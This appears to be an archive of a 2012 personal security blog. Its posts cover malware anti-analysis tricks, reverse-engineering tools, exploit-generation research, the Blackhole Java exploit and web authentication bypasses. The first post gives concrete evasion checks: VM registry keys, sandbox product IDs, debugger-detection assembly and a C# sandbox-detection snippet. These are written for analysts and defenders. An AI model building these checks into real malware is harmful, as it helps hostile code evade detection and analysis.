Thursday, November 8, 2012

How Malware survives to Malware detection mechanisms

Today I'd like to share some basic techniques that Malware(s) use to protect themselves from being detected. Some of the most used approaches to detect Maware could be described as follows:
  1.  Virtualize the environment in where Malware(s) run.
  2.  Attach a debugger to Malware processes and 
  3.  Sandbox the execution of the analyzed Malware.
 It comes straight forward that Malware writers need new techniques to detect the detectors :D. In other words they need tools to figure out if the Malware is being analyzed or not. There are tons of ways to perform these checks, here I just want to sketch same of them for future researches.

Detecting Virtual Machines.
Virtual environments have virtual devices such as virtual interfaces, virtual hard dirves and virtual graphics. Malware(s) by using a widly known techniques against "Malware" (ie. the signature checking technique) can detect the environement where they are running.
For example, a network interface for VMware Workstation has a MAC address starting with 00:50:56: or 00:0C:29. A wise Malware could decide how to behave depending on its environment. For example if it runs on a virtual environment it might decide to not perform malicious actions on the other hand if it runs on a real environment it might decide to perform malicious actions. Another used technique to understand the presence of a VM is to check for GUIDs. For example:

MD5: 0151c5afde070a7b194f492d26e9b3ef (Trojan.Agent-124243 by ClamAV). 

The previous picture represents the function checking for  the presence of:  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProductId 76487-644-3177037-23510. The presence of such a key proves the CWSandbox environment is running on the host platform. Or again, the Malware(s) could check for specific Hard Drives, Video Drivers and even Mouse Drivers. Some classical examples  follow:

 Hard drive driver (VMware):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE\DiskVMware_Virtual_IDE_Hard_Drive___________00000001\3030303030303030303030303030303030303130\FriendlyName VMware Virtual IDE Hard Drive

Video driver (VMware):

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc VMware SVGA II

Mouse driver (VMware):


Detecting hardware signatures is not the only solution for malware writers, there are many other differences between Virtual Environments and Real Environments. One of the biggest is the inconsistency of "Table Registers". We have only one Interrupt Descriptor Table Register (IDTR), one Global Descriptor Table Register (GDTR) and only one Local Descriptor Table Register (LDTR) for each processor on the platform. But since in a virtual environment we have at least two operation systems running symultaneosly, the virtual machine needs to dynamically adjust each "Table Registers" in order to avoid conflicts. The process creates inconsistency between the native "Table Registers" and the virtual ones. A Malware can detect these inconsistencies by using assembly level instructions to read those values. SIDT, SGDT and SLDT might been used to read the original values of "Table Registers".  The following is an example of such a difference.

MD5: b27d73bfcbaec49a95f23b45e9cf9310 (W32.Virut-54 by ClamAV)

The IDT is at:
0x80ffffff in Windows
0xe8XXXXXX in Virtual PC
0xffXXXXXX in VMware

Again, this is not all the malware writers have. Some Virtual machines, such as VMware use backdoors as a communication media between the hosting machine and virtual machines. For example port 0x5658 (ASCII:"VX") is used in VMware virtual environments. Malware might be able to detect the name of the communication port and behave on consequence.

Detecting Debuggers.
Debugging is not per-se a virtualization, however this technique is widely used by reverse engineers in order to understand what the process is doing. Virtualizaion is the first and easiest way to perform Malware Analysis since you get the results out of the box by simply running the executable. Debugging is way more complicated but you have a deep understanding of what the process does in the host machine. Detecting debuggers is another important techniques that Malware writers have to consider during the Malware creation. The following code (taken from here) shows a simple function checking for the presence of an attached debugger on Windows machine.

The above funciton checks the presence of an atacched debugger by asking to IsDebuggerPresent from kernel32.dll. The next function looks for files such as: SyserDbgMsg, SyserBoot and SICE, NTICE. Those files holds the informations, and the history of a debugged process (taken from here).

Another way to detect debuggers is the NtGlobalFlags check:

mov eax, dword ptr [fs:30h]
add eax, 68h
mov eax, dword ptr [ds:eax]
cmp eax, 70h

if the value in %eax register is equals to 70h, a debugger is attachecd to the process. If the process is not debugged the value of the flag is null (there is no such a flag). If you are implementing this check, remember null pointer exceptions...

Another way to detect Debuggers is throught timing out. Debuggers can put break points in the code, and can therefore stop program execution. A program can detect this, by monitoring the system clock. If too much time has elapsed between instructions, it can be determined that the program is being stopped and analyzed.

These techniques are only some of the numerous techniques that Malware writers might use. If you'd like to check them visit the OpenRCE dedicated page here.

Sanbox Environments.
A sandbox is a tightly secured environment where the analyst can run and analyze the behavior of a given application.  It's quite useful since once the execution (of the selectede software) ends everything is automatically restored to the previous state in which the machine was before the run. Being able to restore a "previous state" of an entire OS means to be able to record everything the software does. For such a reason sandbox environemtns are so usefull to analyze M0alware(s).

So usefull but so predictables as well. Pretty much each sandbox has an unique way to be detected. Anubis for example can be recognized based on its product ID (which happens to be: 76487-337-8429955-22614) located at HKMLSoftwareMicrosoftWindows NTCurrentVersion. Following a code snipped able to detect Anubis sandBox (via aspfree):

private static bool AntiAnubis2() {

RegistryKey regProductID = Registry.LocalMachine.OpenSubKey("SOFTWAREMicrosoftWindows"
                           +"NTCurrentVersion", false);
object pid = regProductID.GetValue("ProductId");
string id = "76487-337-8429955-22614";
if ((string) pid == id)
  return true;

return false;

Using the same code is possible to detect JoeBox and CWSandbox as well (just checking for 55274-640-2673064-23950 and 76487-644-3177037-23510 registry keys). Sandboxie and ThreatExpert  do not use fixed Registry keys as the previous sanbox solutions do, so it is not possible to detect them using the aforementioned code. However they do load specific DLLs in the sandboxed environment in order to control the executed software. So why not just checking for such DLLs ? sbiedll.dll and dbghelp.dll are respectively the two used DLLs.

More ways to evade current security solutions are out there, in this post I summed up some of the most used and some of the most implemented techniques. If you are doing reverse engineering please keep in mind that things are becoming complex since malware writers use those techniques quite frequently. Don't stop your analysis on a sandbox, don't run the suspected malware only in virtual environments and keep in mind debugger-traps whle you are using your favorite debugger.

Thursday, October 25, 2012

IDAscope a great SwissKnife for reversers

Hi Folks,
today I'd like to introduce a great tool made by Daniel Plohmann and Alexander Hanel from University of Bonn and Fraunhofer FKIE called IDAscope. IDAscope is an IDAPro extension for easier (malware) reverse engineering: it offers three main functionalities:
From Hacklu slides (click to make it bigger).

  1. Function Inspection. This function implements the ability to tag specific series of called API. The tracked API could be selected and modified into a specific config file (config.json). IDAscope will alert you when specific API patterns will occur. The function inspection functionality enables another super feature called: basic bloc coloring. Having colored blocks in IDAPro is really useful to quick understand what is the purpose of the analyzed pieace of code. What it's common to do, right now, is to collapse blocks by giving high level names. IDAscope offers the possibility to automatically coloring blocks making you way more efficient in recognize useless blocks. Code to Function convertion and automatic rename of wrapper functions are additional usefull functionalities as well.
  2. WinAPI Browsing. Obviously for windows reversers is incredibly useful having Windows API reference manual. Here, by using IDAscope the API reference is next to your eyes for quick and smart lookup. The following image shows both: Blocks Coloring and WinAPI browsing.
  3. From Haclu slides (click to make it bigger).
  4. Crypto Identification. Maybe the most useufl functionality to all the reversers that are used to struggle with multiple tools to figure out what encryption algorithm has been used on the code. IDAscope detects the used algorithm basing its analysis on the ratio of arithmetic / logic instructions to all instructions in a basic block. More details on how it works here (by Juan Caballero). 
For sure a great tool helping out reverse engineers and a great example to everybody who is going to finish his/her PhD on how to "pack" all (or most of) the reseaches done in the past years.

A personal suggestion to push the project to the next step.
What about improving the tagging function to reach out the "behavior analisys" ? You already have implemented some of the basic functions to be able to understand the behavior of the analyzed binary; for instance you already have implemented the lookup function and the tagging function.  What about shipping out the extension within configuration files representing some of the most used malicious behaviors ? There are tons of researches on this field that can be easily implemented in your estension with relatively few effort.

Wednesday, September 26, 2012

Leading a security team

Today I want to start from this sentence written by Frederick P. Brooks, JR. The Mithical Man-Month:

Software systems are perhaps the most intricate and complex (in terms of number of distinct kinds of parts) of the things humanity makes

Being the most complex systems the man can build, software systems are addicted to numerous mistakes either conceptually either technicals. Each mistake hides a bug, and some specific bugs ( the one that could affect the normal security model of the designed system) could become a vulnerability. This is the "why" we still find and we will find vulnerabilities in softwares ... This is the "why" we will need security experts to handle crisis generated by such a vulnerabilities. In this post I'd like to review some of the basic concepts of "team leadership processes" and apply them into red teaming. This is not going to be an exhaustive review of the most used leading concepts but rather a different point of view (from a security perspective) in classic team leadership patterns.

  1. The craft of "securing". Even if many people can argue that security is becoming a science, I do believe we still are in the "craft" time frame. We can't say it is an Art, because we have methodologies, guideline, policies, and even designed patterns. We can't say it's science, since we can't reproduce the same results (aka the same security level) in every environment. We still have no idea on how to measure "security"! So it is correct to call the "security discipline" a craft. If it is a craft we won't be able to predict the precise cost of "securing" a system. We won't be able to know how many 'penetration testing hours' are needed to secure a whole system, we need experience to be able to give an accurate estimation.
  2. The joy of understanding. While Frederick P. Brooks in his famous book pointed out that the "craft of programming" gratifies developers because they are making things, we cannot say the same for security engineers. We had not the joy of making things.. Developers make things, we broke things for testing their security properties. So what is the spirit of a security engineer? The joy of understanding how things are done. A great security engineer is the one who loves to disassemble, to learn, to discover how other people did such a thing. The necessity in understanding, in learning, in disassembly things take the security engineer in a position to know what is strong and what is not. After some experience the security engineer is the one able to compare two different systems and to judge their models and their designs with respect to security features.
  3. Good cooking takes time... Security process such as the penetration testing process needs time, it cannot be hurried without spoiling the result.
  4. Partitioning a task among multiple engineers occasions extra communication effort, that it doesn't come for free. Partitioning is often a great solution but is not always the best solution. Adding people at the end of a penetration testing process will take to this process much more time respect of having no additional engineers. If you are in rush don't add more people. People need to be trained and they need communication with current engineers to catch up the whole contest before being able to produce actively to the process. Take people into penetration testing at the beginning of the process, never at the end of it, you will not finish the process on time.
  5. The perfect team. A chief-security engineer, a surgical-team made from a small amount of talents offers a way to get the process integrity of few minds and the total productivity of many helpers, with radically reduced communication.
  6. Find the most valuable vulnerability. Finding the most valuable vulnerability often correspond to attack the conceptual integrity of the system. Understand how the system works, and firstly focus on the conceptual integrity of the system and later on technical aspects.
  7. Communication between team members. Definitely the most important task a team manager have to guarantee. Communication. Thanks to communication people have new ideas, find solutions and find the way after having lost it.
  8. Organization and role definition. A good organization and a good role definition is fundamental to coordinate talents and often "big egos".
  9. Plan to throw one away. According to Frederick P. Brooks, JR. In The Mithical Man-Month, there is always a wrong way that eventually you and your team will take, you will, anyhow. Plan to throw it away, and start from the previous state. Don't loose time in tying to recovery a test, don't lose time to try to convert a specific designed tool to fit another bug, don't try to reuse a reverse engineering status from the previous code revision. Find the power to admit the failure and start it again.
  10. Documentation, documentation and... (Try to guess... ) documentation! Is your only true weapon to speed up the learning process and enable a fast context change. I know, when you reached a result, such as a tool for testing a specific system, a 0day or a new injection status you think to be wasting time writing documentation. But is not like that... And you know that. So remember each time you should write docs, that is almost valuable as the task you have just concluded.

If you have to manage a penetration testing group, I hope it might be helpful. Let me know, any comment is appreciated

Wednesday, September 5, 2012

Yes, we all are immortals...

Today I'd like to share a nice article on immortality written by Marcelo Gleiser. I know it's quite a bit out of topic for my blog, but it is worthy. The article presents a great theory on immortality based on Internet. I extracted few sentences to sum up the theory :

[...] Apart from gene transmission — not very satisfying from an emotional perspective and diluted with every generation — we could say that you existed so long as someone remembered you.
That's not true any more. Something of you now exists so long as electrons course through the wires of any person's computer in the world. It's quite a thought to recognize that we have a new kind of immortality to share. It should raise our collective awareness of how we'd want to be remembered. The words and pictures will remain, long after we are gone, for anyone who cares to look for them. [...]

Hope you enjoy it as I did. It made me think about how the immorality concept has radically changed during the past decade and with it all the life has been changing since the information became shared.

Friday, August 17, 2012

Raising Risk Awareness on the Adoption of Web 2.0 Technologies in Decision Making Processes

Today I'd like to share a paper that Marco Prandini and I wrote on the use of Web2.0 in decision making process. The paper can be found here on the Journal of Future Internet.

Abstract: In the recent past, the so-called “Web 2.0” became a powerful tool for decision making processes. Politicians and managers, seeking to improve participation, embraced this technology as if it simply were a new, enhanced version of the World Wide Web, better suited to retrieve information, opinions and feedbacks from the general public on subjects like laws, acts and policies. This approach was often naive, neglecting the less-obvious aspects of the technology, and thus bringing on significant security problems. This paper shows how, in the end, the result could easily be the opposite of what was desired. Malicious attackers, in fact, could quite easily exploit the vulnerabilities in these systems to hijack the process and lead to wrong decisions, also causing the public to lose trust in the systems themselves.


Web 2.0 is for sure a great opportunity and an amazing paradigm that could be very useful for politicians or decison makers in the more broad way. However web 2.0, as described in e paper, could be very dangerous if used to attack a decision chain. The paper describes and gives examples on how a possible attacker could attack current political decisions by exploiting simple and well known Web 2.0 bugs. I recommend this reading to all of you involved in politics and/ord decision making, in addition to everybody who works for government agencies.

Tuesday, August 7, 2012

JavaScript and Botnets

After an entire period of time busy in traveling and moving to a new city I am finally back on my blog. Not sure abut the frequency of my future posts but still very interested on keeping on posting my working topic ;). Probably I'll be able to post a little bit more from now... Most of you are already aware about the DevCon 2012 and its new topics on security, so I won't spend time on this discussion, but I do want pointing out an interesting technical paper presented by Chema Alonso and Manu "The Sur" titled :" Owing Bad Guys {& Mafia} with JavaScript Botnets".

The paper describes how attackers, by exploiting TOR networks and public available proxies, can intercept user's traffic, and injecting malicious JavaScript to exploit users' browsers. The technique per-se is well known from years and the framework they used to load malicious payloads (BeeF) is already widely used around the hacking community. So what's so interesting about this paper if it does not introduce any new concept? I found really interesting the analysis on the users they had. in other words who is using public available proxies and TOR networks.

Let's take a deeper view of it. The following image shows the general idea about the implemented attack on a proxy server (BTW they setup a SQUID proxy and the registered it on public proxy registries).

SQUID server has the property to modify traffic following specific roles. Originally these roles have been designed for parent control and for blocking some specific domains, but it can be used under a malicious perspective to inject malicious JavaScript on downloads pages. The authors used a poison script to inject malicious JavaScript. Following the infection:

Again I don't see any interesting technique in this. BUT I do see the beauty of this study in capturing the "stakeholders". If you follow on reading the paper, authors show who used this proxy and what he did with it. Obviously most of the performed operations by exploiting the free (and hacked) proxy were with malicious intents. One of the most interesting proves that authors provided is about Scam and people who answered back by giving personal informations.

Most of the stakeholders come from Ex-URS, Brasil and USA. Many of them from Cina, only few of them from Europe. Beside normal stats on where users come from, understandings how malicious hackers use proxies to attack is really interesting. Another little but significative theoric brick could be added to all the knowledge we had from honey-net project.


Friday, June 22, 2012

Computer Security: Training and Education

Today I want to spend a little bit of time pointing out an important concept of computer security: the Education. I want literally cite the Security and Privacy's Guest Editors' introduction on what is education, what is the difference between training and education and why is so important on computer security .

As technology creators, providers, and users, we must answer significant questions to address these problems, for example:

How can we help individuals be good cybercitizens ? In particular, how can we give them a clear understanding of both cybersecurity issues and how their personal choices affect cybersecurity?

Can building an effective cyberworkforce help users understand their responsibilities online and with computer-based technologies ?


Some People are still thinking on why computer security is such an important topic, or why there is the need of having security online, or even worst, people who say they "don't believe on computer security" (whatever it means)... Well , I believe this Guest Ednitor's introduction should be a mandatory readying for every student and even for every "security skeptical " around the globe. It explains by using simple concepts and practical examples why computer security is such an important topic in the current world and why security education is even more important since could affect citizen behaviors.


Another great lesson comes from the distinction between education and training. Training refers to learning concrete skills for meeting specific, real-life goals in a clearly understood situation. By contrast, education focuses on understanding and knowledge, learners can associate principles and concepts, apply them to solve a variety of new problems, and evaluate those solutions' effectiveness .

This is another huge and quite delicate topic: training, often represented by private companies and private sectors VS educating, often represented by Universities and the entire academic world . Those two entities often in totally disagreement between them, share one of the most important topic related to computer security.

I do finally suggest this reading, even if it's not a technical one it offers great cornerstones to fully understand security education and security training: when they should occur, when and where one is the most useful an when and where the other one is needed.


Saturday, June 2, 2012

A great analysis post on Flame string encryption

Hi folks,

It's quite a long time since last post, I am sorry about that. I am in the middle of a quite long traveling period, so forgive me to slowing down a little bit my security posts. Today I d like to share an interesting Post written by "Spider Labs Anterior " regarding the string deobfuscator using IDAPython.

Yes, it is on Flame too.. I wouldn't write about Flame since everybody out here is talking about it, plus I had no time to personal analyze it, so unfortunately I have nothing to add to the enormous flock of posts on it :) (BTW this paper is high recommended ).

The author, Josh Grunzweig, shows his path to find out the obfuscating technique used in Flame. I think it is worth to keep in mind because perfect to didactic purposes. From IDA graph he reproduced the following code. Every analyst should do this step!! I often miss it and try to solve by patching the code or by pencil and paper, but doing in this way will save a lot of time in long term analysis. I collect his main analysis following.

The function above is taking the obfuscated String as a parameter, and checking the sixteenth byte to determine if it is null. This byte is acting as a Boolean value to tell the function if the String has already been decoded. In the event that this byte is not set to null, or 0x00, another function is called, and the sixteenth byte is set to 0x00. Finally, the result of String that was initially supplied as a variable, with an offset of +20, is returned. If I were a betting man, I’d suspect that the second function (named ‘deobfuscate() in the above Ruby code) is manipulating the data somehow. In order to find out, let’s investigate what is going on. If we look above, we can see that this new function is supplied two arguments—The 'obfuscated_string' variable with an offset of +20, as well as the eighteenth byte in 'obfuscated_string'. So this function appears to call a third function (last one I promise), and proceeds to subtract the resulting number from the specific character in the string before replacing it. So if we were looking at the first byte (0xA7), and the third function returned 0x82, we would get the following:0xA7 – 0x82 = 0x25 (“%”)

Great job Josh and thank you for sharing it !

Monday, May 14, 2012

Automatic Exploit Generation: a Provocative Post

Today I went trough a very interesting paper written by Thanassis Avgerinos, Sang Kil Cha, Brent Lim Tze Hao and David Brumley from Carnegie Mellon University titled: "AEG: Automatic Exploit Generation". The paper describes a technique and an implementation of an automatic engine able to generate exploits from source code and binaries. AEG has been introduced in NDSS 2011 and it is really amazing :D

From the Abstract:
We used AEG to analyze 14 open-source projects and successfully generated 16 control flow hijacking exploits. Two of the generated exploits (expect-5.43 and htget-0.93) are zero-day exploits against unknown vulnerabilities. Our contributions are: 1) we show how exploit generation for control flow hijack attacks can be modeled as a formal verification problem, 2) we propose preconditioned symbolic execution, a novel technique for targeting symbolic execution, 3) we present a general approach for generating working exploits once a bug is found, and 4) we build the first end-to-end system that automatically finds vulnerabilities and generates exploits that produce a shell.

The following picture shows the way the authors designed their Automated Exploit Generation system.

Te system performs both analyses: Static analysis on source code and Dynamic analysis during the runtime execution. It then generates an automated exploit and it verifies it before resulting it as output. Following,  an astonishing video proving the reality of the AEG system.

Now, I've never tried AEG, I cannot say that it really works or what are the limits it has got, but I would be very interesting in  reviewing it. It seems that it might really change everything into the security world. 

On one hand I am a little bit scared about it for two main reasons: (a) it could be used from good guys as well as from bad guys. And bad guys with this powerful tool could act very badly. I know, this is like many other theories and tools in computer security... Even my book could be used from bad guys to learn how to exploit systems right ? My worries here is about the usability. it seems to be pretty "user friendly"and really effective too. Plus it covers almost all areas in the software exploiting process that everybody could use it and be very effective. And (b) AEG rises a serious question: do the security professionals really need to exist anymore ? ( I am very provocative )I know, AEG is probably a very Beta tool, but what will happen once it will be tested and ready to be used ?

Let 's just analyze what happened during the past decade to computer security experts. At the beginning of the computer security era, only few people were able to compromise systems, it was considered something like a gift.  Then it become an Art, I remember the magic book of Matt Bishop, Computer Security: Art and Science which fixed basic concepts of what computer security was and what penetration testing was going to happen.  Only few skilled people were able to practice such an Art because it was hard to study and difficult to learn such low level techniques. Later on it became a discipline, with tools, weak theories and wide documentation on how to attack or to exploit systems... few scholars were able to exploit systems.  Finally it become a Science thanks to Methodologies that made the Exploit process reproducible over time, basically everybody with a strong technical background and passion for the computer security can learn how to compromise it. Now.... is it becoming an automatism ? 

AEG seems to be a perfect tool to automate the full stack exploiting process, from analysis to exploiting. The question is the most obvious one:  Do we still need penetrator testers, and vulnerability hunters ? )Or it is going to be enough an automatic tool ? (I am provocative deliberately )

Is the exploiting process becoming  quick and easy as running an automated tool ? If this is going to happen what will happen to the computer security scientists/expert/engineers ? Anther question, maybe the most important one ... if a software able to discover most of the possible vulnerabilities is going to be available what about the "Computer Security Science" ?  Will it be science yet ? Or will it become a simple Technique ? Or even an Automatism ?

Following the exploiting process steps I see :

Gift (few rare persons able to exploit) -- Art  (few very skilled people able to exploit) --  Craft  (books, tools, and tutorials. Few scholars and very motivated people able to exploit)  --  Science (reproducible, basically everybody with strong technical background could be able to exploit) -- Automatism (everybody, or even nobody, there is no need of having people able to exploit, one automata will do it for everybody)

Tuesday, May 1, 2012

Plaid CTF results

I am so proud about our security group, made by the most talented hacking students in the university of Bologna. CeSeNA ( Cesena Security, Network and Applications ) is the official name of the security team I used to lead, but when those students compete in hacking contests the official name jumps to ANeSeC ! CeSeNA for security and ANeSeC for hacking purposes.

The past weekend ANeSeC participated to a quite known hacking contest: the plaid CTF. 720 teams from 82 different countries. We were 42th (and first Italian team) !! Not bad at all considering some "key elements" were not playing !! Good job CeSeNA-ti I am so proud !!


Friday, April 27, 2012

Bypassing .htaccess by using GETS

Hi folks, during these days I am traveling a lot for job, and unfortunately I don't have much time to write posts. Hovewer today I wanna share a really nice post about a classic problem affecting the HTTP basic authentication method in PHP applications. The post ( written by armoredcode ) is about a 2 years old bug described by Owasp in 2010 (here) , by cd34 (here) and by Eguaj (here, which btw, explained with lot of details). I'd like so much this post because is not about vulnerability (which is very known, even if very spread over websites) but is about the whole hacking process, from scratch. Pablo Perego wrote a very detailed process and very deep considerations that drive the reader to a full understanding of what the problem is. Following the images of the fundamental steps taken from armoredcode. First a HTTP request with empty body.

And then the request for the backed page.


Again a great place to start to look into the hacking reality and a good example of simple vulnerability exploiting process .

Following the main followed steps:

  1. fingerprint the operating system, the web server and the programming language version using netcraft He discovered a “/backend” directory looking into a javascript file he found in a browsable “/static” directory.
  2. Paolo crafted custom HTTP requests in order to bypass HTTP Basic Authentication that it was in place to avoid curious people to look into the backendI was able to make updates into the database…
Please refers to the original website to learn more about the "lessons learned" .

Saturday, April 21, 2012

EXE null EntryPoint execution

Hi folks, today while I was surfing on my personal feeds I hit this interesting picture ( the original from Twitter is here). I am not going into the details since the picture is quite self explaining (plus I am traveling and not much time, unfortunately )


The first binary is a DLL with a null EntryPoint, basically it won't load. The second binary is a a PE executable with null EntryPoint too. The third and last executable is a "good" PE executable, in the sense that it gots a valid EntryPoint . In the black shell the author shows the execution of the two PE files. Both of them run ( both of them end in the execution of the null reference DLL). The actual PE with null EntryPoint got its %EP executed. Quite interesting isn't it?



Tuesday, April 17, 2012

The Biggest App Sec Mistakes Companies Make

His folks, today I would share some thoughts about the "mistake that company often do on computer security" . Mu thoughts on that topic have been published on veracode website. Directly from veracode:

Veracode Marketing recently polled a list of InfoSec luminaries, asking them “What is the biggest mistake companies make with Application Security and how can they fix it?” We’re pleased to present the responses from a wide array of security experts including Bill Brenner of CSO Magazine, Andrew Hay of the 451 Group, Jack Daniel of Tenable Network Security and Veracode’s own, Chris Wysopal. While all our experts have their unique perspectives, some common themes arose including the basic idea of taking application security more seriously and committing to a programmatic approach vs. ad hoc manual testing. We want to thank all our respondents for participating and we welcome your thoughts too – use our comment area and tell us, “What do you think is the biggest appsec mistake companies are making today?”

Is your company actually doing these mistakes too? If you are interested in sharing opinions about that or you want your thoughts don't esitate to contact me.


Sunday, April 15, 2012

X86 detailed informations

Hi folks, today I share a nice x86 resource called sandpile. It wraps out all the most important things to know about x86 processors, a very nice place where to find all the information that you need. Before it, I used to search into many different resources loosing time and energies in content switching and in figuring out the many different searching functionalities belonged to various resources.

The website offer 4 maing groups of categories: regs, where you find all the registers related informations. Codes everything you would like to know about code, data and misc where bayou will find everything else you need about x86 architecture. Let's take a look to interrupt table:

Each information is sotored in a clear and intuitive table. I Totally suggest to have a bookmark within its reference. Good job !!


Wednesday, April 11, 2012

A Design Methodology for Computer Security Testing

Yes, finally the first edition of my new book is available online. The book collects 3 years of researches in the penetration testing security field. It does not describe underground or fancy techniques to attack systems, it is most focused on the state of the art in penetration testing methodologies. In other words, if you need to test a system, how do you do ? What is the first step ? What tools can be used ? Or again, what is the path to follow in order to find flaws ?The book shows many real world examples on how the described methodology has been used. For example: penetration testing on electronic voting machines, how malware did use the describe methodology to bypass common security mechanisms and attacks to reputation systems.

Contributions :

  1. Penetration Testing Methodologies Overview. 
  2. Penetration Testing Evaluation Properties.
  3. Proposed Penetration Testing Methodology.
  4. Enhanced Penetration Testing Methodology for E-Voting Systems. 
  5. Practical scenarios: Applying Penetration Testing Methodologies.
  6. Proposed Coordination-Based Approach to Electronic Voting Systems.
  7. Examples of Methodology in Real Cases.
Index (click on it to make it big):

Please if you want some information or if you have some suggestions about it, drop me an email I'll be happy to answer to your questions.

Monday, April 2, 2012


My folks used to work with Java code, for many different reasons we often prefer Java rather then other languages and knowing Java vulnerabilities, for sure, helps developers in doing their job. Blackhole is like most other malware, it spreads over iframe and it executes a downloaded payload. ESET Threat blog in this post explains its execution in a colloquial but pretty complete way, a good reading. But what is interesting about this malware (at least for me) is the brand new used vulnerability : CVE-2012-0507 . CVE-2012-0507 describes an interesting vulnerability found in the Java AtomicReferenceArray class implementation, which wasn’t checking properly whether the array was of an appropriate Object[] type. A malicious Java applet could use this flaw to bypass Java sandbox restrictions in order to execute malicious code outside of sandbox.
The blackhole infection starts with a classic iFrame like the following one:

The infection goes on following these steps ( image taken from here) :

David Harley did a great job in decompile the java code and in describing its workflow. Basically the java executable is built over 3 main functions:
  1. Init(). The malicious Java applet builds the object AtomicReferenceArray ( the vulnerable one) for the execution of malicious Java code outside the sandbox.
  2. Work(). This method builds the code of a class which executes outside the sandbox.
  3. DownloadAndExec(). This function downloads a malicious executable file to %TEMP%dsh89gyu.exe and executes it. Which happens to be a Win32/TrojanDownloader.Carberp.AH. In order to bypass detections by security software, the attackers changed the encryption algorithm and string obfuscation for the payload class executed outside the sandbox
Java malware are becoming day by day more and more spread over the net, on one hand because Java bugs are pretty common nowadays and on the other hand because java is "platform independent" by meaning that the attacker needs to write only one exploit overall and not one exploit for each attacked platform. I am very fascinating about java exploiting, and I totally think that CVE-2012-0507 is remarkable example to show while explaining java vulnerabilities and Blackhole a great example of java malware. 

Wednesday, March 28, 2012

Windows Malware: a reversing engineering document.

Today I'd like to share an interesting PDF found while surfing on some of my favorite feeds. The PDF is titled: "Deep dive into OS internals with WinDB" . Well, you might think this is going to be the same document explaining windows malware analysis, but not ; it is not the "always the same document". What I liked about it, is the easy way it shows information, small document with a lot of information. You could read it as a cheat sheet or as a little manual as well.

There is more than one reason to reverse malwares these days. As time passes by, the awareness about Reverse Engineering is spreading. However, there are few obstacles encountered for a person new in the field of Reversing Viruses. Unlike other domains of security where you can make your way through with the reliance on some security tools, this field demands a strong understanding of the Operating System Internals and Assembly Language Programming.

The author covers many of the most important arguments in the field of the reverse engineering by giving the essential flavors of the following topics: basic concepts of reversing, a very brief summary of PE anatomy, DDI and importing tables, exporting table (those sections are very intensive;) and so on.. Well, I personally suggest this reading to averybody aims to know more about reversing engineering stuff, but have not much time to read whole manuals, and to everybody working on hardsecurity topics but not everyday practitioners. And obviously to " security students" who should be avid readers of such things. :)


Saturday, March 24, 2012

ROP and deROP

I ve been writing a lot about ROP in my past posts ( Here for a collection) covering some of the principal anti ROP techniques used by modern operative systems. Today I 'd like to suggest another great reading from Kanjie Lu et Al. From Peking University, Cina titled "deROP: removing return oriented programming from malware."

Many different researches put theirs efforts in finding a good ways to fight ROP malware, for example Davi et Al. And Chen et Al. Implemented a threshold system able to count how many buckets of instruction followed by RETN are present in a executable, once the threshold is reached the security mechanism alerts the user about that. Another direction is to look for violations of last-in, first-out invariants of the stack data structure that call and return instructions usually maintain in normal benign programs. Francillion Et Al. Implemented shadow return address in hardware stack such that only call and return instructions can modify the return- address stack.Davi et al. claim that it is possible to extend their ROP defender with a frequency measurement unit to detect attacks with return-less ROP. The idea is that pop-jump sequences are uncommon in ordinary programs, while returnless ROP invokes such a sequence after each instruction sequence.Most recently, Onarlioglu et al. propose G-Free, which is a compiler-based approach to defeat against any possible form of ROP.

Kanjie Lu in this paper propose a "conversion tool" able to transform the most advanced ROP-Based payloads into equivalent non-ROP Payloads able to being analyzed from normal Malware analysis tools.

Instead, we propose an automatic converter, called deRop, to convert ROP shellcode into its semantically equivalent non-ROP shellcode so that any of the existing malware analysis tools can ana- lyze it.
The following image (taken from the paper ) shows an high level overview of the designed deRop system.

The paper well describes all the process behind the development of the tool underlining main difficulties and structural choices. The authors tested their work by applying their tool on 4 real Payloads obtaining great results.

Even if the idea behind the entire work is surprising good, the developed tool presents some limitations if applied in real wokrld, for example its output is one running instance specific in ASLR, and again deRop needs dynamically executing the vulnerable application in order to locate the gadgets in the ROP exploit. But to know more about that please read the whole paper it is really a good reading ! Have fun.



Friday, March 23, 2012

Android bug hunting framework

Hi folks,

today I'd like to share a very promising framework called Mercury. Mercury is a free framework for bug hunters to find vulnerabilities, write proof-of-concept exploits and play in Android. Use dynamic analysis on Android applications and devices for quicker security assessments. Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices. The easy extensions interface allows users to write custom modules and exploits for Mercury Replace custom applications and scripts that perform single tasks with a framework that provides many tools.

To know more about it here, and here (documentation). Actually I am not an android security expert, so far I have never been involved in some security related android projects, but from what is my knowledge about security trends and little bit of security history I would bet on it, it seemed very promising and user friendly! Great job guys, keep going on it !






Wednesday, March 21, 2012

Book Review: The Tangled Web. A guide to Securing Modern Web Applications

Everybody who reads this blog should be familiar with the computer security science. Computer security strongly depends from complexity, by meaning that much more complex is a system much high is the probability to have a vulnerability on it. Web applications, from simple HTTP requests to browser-side plugins, strongly interact with other applications making alive a very complex system. Each complex system comes with vulnerabilities. Due to the flexibility, adaptability and availability web applications make some of the most complex system available on the digital era, and for this specific reason are one of the most bugged systems.


Michal Zalewski is one of the most talented browser security expert. He wrote many books but today I am going to suggest his last book titled : "The Tagled Web A Guide to Securing Modern Web Applications", published by No Starch Press

Definitely Michal Zalewski wrote one of the most interesting book on the topic, it does not describe techniques to attack or how to defense applications by giving advices or simple examples, it really goes deep on the core problem analyzing almost all the Web technologies. He underlines weakness and why web browsers are fundamentally insecure pointing it out during his very deep working analysis. The reader will learn how things really works and why there will always be vulnerabilities in such a models.  

A very interesting tool offered by the author is the "Security Engineering Cheat Sheet" available at the end of every chapter, it offers a quick way to sum up what the reader has learned so far. It's very useful even for a posteriori reading or for a quick search on contents.

Definitely a "must have" in any computer security engineer library.

Thursday, March 15, 2012

Free iPhone Security Reader

Hi Folks,
in the past days I have been traveling a lot and I needed a specific security feedreader for my mobile device. I have an iPhone and while I was looking into the APP-Store I was unable to find a free security specific feed reader, I got the chance to find out only generic feed readers and most of all were not for free. So I decided to build one Security specific reader and,  exploiting the new SDK feature (distributing it without the need of the APP-Store), I decide to put it freely available from this post.

